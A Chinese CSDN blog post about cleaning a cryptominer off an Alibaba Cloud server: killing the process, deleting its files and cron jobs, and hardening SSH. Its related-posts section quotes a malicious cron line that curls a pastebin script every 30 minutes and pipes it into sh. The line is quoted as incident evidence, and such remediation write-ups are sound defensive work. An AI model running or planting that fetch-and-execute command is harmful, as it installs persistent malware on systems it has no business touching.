记一次阿里云服务器被挖矿的经历

最新推荐文章于 2024-05-31 12:43:11 发布
最新推荐文章于 2024-05-31 12:43:11 发布
阅读量1.4w 收藏 16
点赞数 3
分类专栏: Linux 文章标签: linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/key_768/article/details/105572113
版权

被挖矿

大早上起来,发现被“挖矿”了,云服务器在大晚上发了几条警告消息

在这里插入图片描述

真TM恶心,它伪装成一个程序,占有99%的内存,通过借助大量计算能力去做别的事情

在这里插入图片描述在这里插入图片描述

解决

top命令查占有进程
会出现这种占有99.9%的进程

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND                                      
 30049 xm        20   0  373576   2720    404 S 99.9  0.1   1252:00 java

如果是云服务器,先杀死kill -9 30049,去安全中心找它安装的程序
不是的话,就先别杀死,通过进程找到它安装的程序cd /proc/30049

然后去删掉文件
在这里插入图片描述

在这里插入图片描述

这两个文件删了

然后还有把定时任务删除,不然会死灰复燃

启动查看定时任务的程序

service crond status

(需要安装crontab)
在这里插入图片描述
需要知道这个进程是哪个用户的,前面显示的User是xm(如果被破解root用户就还需其他操作)

查看xm用户下的定时任务crontab -u xm -l
在这里插入图片描述

果然有3个定时任务,杀死xm下的所有任务crontab -u xm -r
在这里插入图片描述

加强安全防范

从上面的安全警告可以看出,这是破了xm用户的ssh密钥

从几个方面去加强安全防范

  1. 修改xm用户的密码,由于xm用户是弄着玩了,密码就是123456,太简单了,改一下
  2. 修改端口22,SSH的默认端口是22,谁都知道,可以改一下

修改默认端口:vim /etc/ssh/sshd_config

在这里插入图片描述

然后重启服务:systemctl restart sshd.service

如果是云服务器,去安全组加上自己的端口号

有机后浪
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QT连接阿里云服务器的MySql数据库示例
06-10
在本文中,我们将深入探讨如何使用QT框架连接到阿里云服务器上的MySQL数据库。QT是一个流行的开源C++开发框架,广泛用于构建跨平台的桌面、移动和嵌入式应用程序。而阿里云提供了稳定可靠的云服务器服务,是许多企业...
详细部署阿里云服务器全过程(图文教程)
01-09
部署云服务器,首先需要的便是购买云服务器,这里我选择的是阿里云服务器,注册实名认证这里就不详细说明了,我购买的是云服务器ECS,可以选择大学生优惠,一个月9.5元,算是很实惠的。 我选择的操作系统是Linux...
阿里云服务器挖矿
最新发布
weixin_44034675的博客
05-31 1039
新增SSH端口——>重启sshd服务——>添加防火墙规则——>尝试新端口登陆——>关闭原先的22端口——>增加ip白名单。dr-xr-x---. 8 root root 4096 3月 19 15:57 ..drwx------ 2 root root 4096 3月 18 14:47 .drwx------. 2 root root 4096 8月 9 2019 .- 删除i属性使文件 /etc/passwd和 /etc/shadow具有相同的属性。控制台会自动断开之前使用端口22产生的连接。
阿里云服务器挖矿?kdevtmpfsi 进程CPU100%
New_CJ的博客
05-28 537
收到阿里云警告服务器中蠕虫病毒,进行top 大致是这样的,kdevtmpfsi 的CPU占满, ps -aux | grep kinsing ps -aux | grep kdevtmpfsi 可以找到对应的PID kill -9 PID 2个都得杀 find / -name kdevtmpfsi find / -name kinsing 再rm 掉这样文件。。。。。。。。。 然而事情并没有这么简单。。过了会它又恢复了。。然后就删了恢复删了恢复。。。 最后发现 Docker镜..
如何利用云服务器挖矿_如何搭配使用最优最省的云服务器
weixin_39537680的博客
11-05 724
目前很多应用都已上云、大家如果开发一个平台,或者开发一个网站都需要相应的服务器。随着云技术的发展,越来越多的用户选择阿里云服务器、百度云服务器等。但是在使用过程中,很多用户都感觉费用每年还是比较高的,尤其是有一部分中小型企业用户。可能他们的数量是几台或者几十台服务器,也可能就一两台。但是每年都需要续费。 如何搭配使用最优最省的云服务器近期接到很多用户咨询希望能节省一些资源。今天就百度云服务器,注意...
阿里云服务器CUP爆满被用来当挖矿机(要疯!!!!)
Coinker的博客
05-14 4695
事件起源于阿里云的短信: 1.然后查看CPU: 我擦,果然饱满 2.尝试Kill掉这个进程,Kill -9 9883 我擦,没两分钟又起来了。 3.查找源文件 find / -name '*bbb*' 4.进入目录 尝试rm掉这个bbb文件,我靠,root用户都删除不了 5.查看系统定时任务调度 crontab -l, 靠源头这是这里 尝试删除定时任务,然后保存 crontab -e 我靠,root也没有权限修改 6.进入定时任务目录(根据上边报错的路径) cd /var/
云服务器 被挖矿 未解决
qq_40567146的博客
09-04 792
连接阿里云服务器发现很卡,top 显示不出高占用进程,cpu100%占用。 crontab -l  发现有定时任务: */30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 地址打开找不到源码,根据网上资料操作:vim  /etc/ld.so.preload   删除其中内容 后执行ldconfig 再使...
一次Ubuntu服务器被黑经历
01-10
最近我们的一台Ubuntu阿里云服务器一直提示有肉鸡行为,提示了好几天,开始并没有关注,然后连续几天后发现应该是个大问题啊。很可能服务被侵入了!!! 寻找线索 一开始我是完全懵逼的状态的,Linux不是很熟悉,只会...
阿里云服务器修改网卡后无法连接怎么办
01-09
阿里云服务器在进行网络配置更改,特别是将动态IP地址(DHCP)更改为静态IP地址时,可能会遇到连接问题。这种情况通常与网络配置文件的错误设置有关。在Linux系统(如CentOS、Ubuntu等)中,网络接口的配置文件位于`/...
ESP8266+STM32+MQTT发送数据到阿里云服务器
04-22
[一、配置阿里云服务器](https://blog.csdn.net/weixin_46627856/article/details/135963863?spm=1001.2014.3001.5501) [二、使用MQTTX本地软件测试功能]...
录阿里云被挖矿程序入侵
weixin_40660221的博客
07-30 613
起因 今早阿里云提示我ECS服务器上有挖矿程序(c_sh),CPU使用率维持在99%。 系统为centos8 阿里云告警提示(我手动处理了的告警,初始界面没保留) 处理 top命令查看到31911端口的c_sh进程占用90%多的CPU使用率 先是让阿里云自己处理(杀掉挖矿程序),但是top命令查看这个挖矿程序又换了32366端口启动 原本挖矿程序的路径是/proc/31911/root/root/c_sh,杀掉c_sh进程之后再找/proc/31911/root/root/c_sh发现文件不存在。top命
云主机被挖矿解决方法
qq_38472451的博客
08-22 3197
云主机被挖矿解决方法
一次处理阿里云服务器挖矿
u014442879的博客
12-30 1309
一个名为kdevtmpfsi进程,大量占用CPU,阿里云报警,被挖矿,查询后确定为docker容器镜像带的病毒 常规处理,进程杀不死 处理方法 1 kdevtmpfsi有守护进程,单独kill掉kdevtmpfsi进程会不断恢复占用。守护进程名称为kinsing,需要kill后才能解决问题。 ps -ef | grep kinsing kill -9 '父进程' 2 全局查找带有kdevtmpf...
云算力保卫战 云主机挖矿治理“三步半”
Sophya89的博客
06-14 3443
【2022年6月14日】“挖矿”行为的危害无需多言。自去年以来,我国虚拟货币监管政策持续加码,清退“挖矿”活动与禁止相关业务活动双管齐下,全力打击治理违法“挖矿”行为。就如上面这个通告中说明的一样,虽然运营商、服务商已经全面禁止云主机挖矿,却仍有不少“矿工”会千方百计,发动无差别攻击去寻找“矿机”,而疏于防范的云主机便是他们的猎物之一。 沦为“矿机”的云主机,危害有大? 首先,“挖矿”需要一个庞大的算力系统,会完全吞噬用户的云算力,云主机CPU飚满,直接影响企业的正常业务往来,更会付出额外的电...
阿里云服务器挖矿的解决方法
qq_47464056的博客
07-25 4916
云服务器被入侵植入挖矿程序!
阿里云被恶意挖矿的处理方法
qq_55809729的博客
10-03 929
亲测:阿里云被恶意挖矿的处理方法
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 2087
一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
大佬们云服务器被挖矿了怎么解决
qq_43521809的博客
08-30 4240
今天收到阿里云的短信,发现机器被挖矿了,但是top查看进程并没有看到cpu高的进程,这个情况下束手无策,大佬们都是怎么排查解决的
一次阿里云ECS服务器图片资源迁移至 阿里云 oss
05-27
好的,您可以先登录阿里云ECS服务器,然后安装OSS工具包,可以使用以下命令: ``` sudo apt-get update sudo apt-get install ossfs ``` 接下来,您需要在阿里云OSS中创建一个Bucket,并且获取您的Access Key ID和Access Key Secret。 然后,您需要使用以下命令来mount OSS到您的ECS服务器: ``` ossfs bucket-name /mnt/oss -ourl=oss-cn-hangzhou.aliyuncs.com -o nonempty ``` 在这个命令中,"bucket-name"是您创建的Bucket的名称,"/mnt/oss"是您将要mount的本地目录,"-ourl"是您的OSS endpoint,"-o nonempty"用于指定如果本地目录已经存在文件,则不要清空。 最后,您可以使用以下命令将您的图片资源从ECS服务器迁移到OSS: ``` cp -r /your/local/image/dir /mnt/oss ``` 这将会将您本地的图片资源复制到/mnt/oss目录中,由于ossfs已经mount了您的Bucket,因此这些图片资源将会自动同步到您的OSS中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值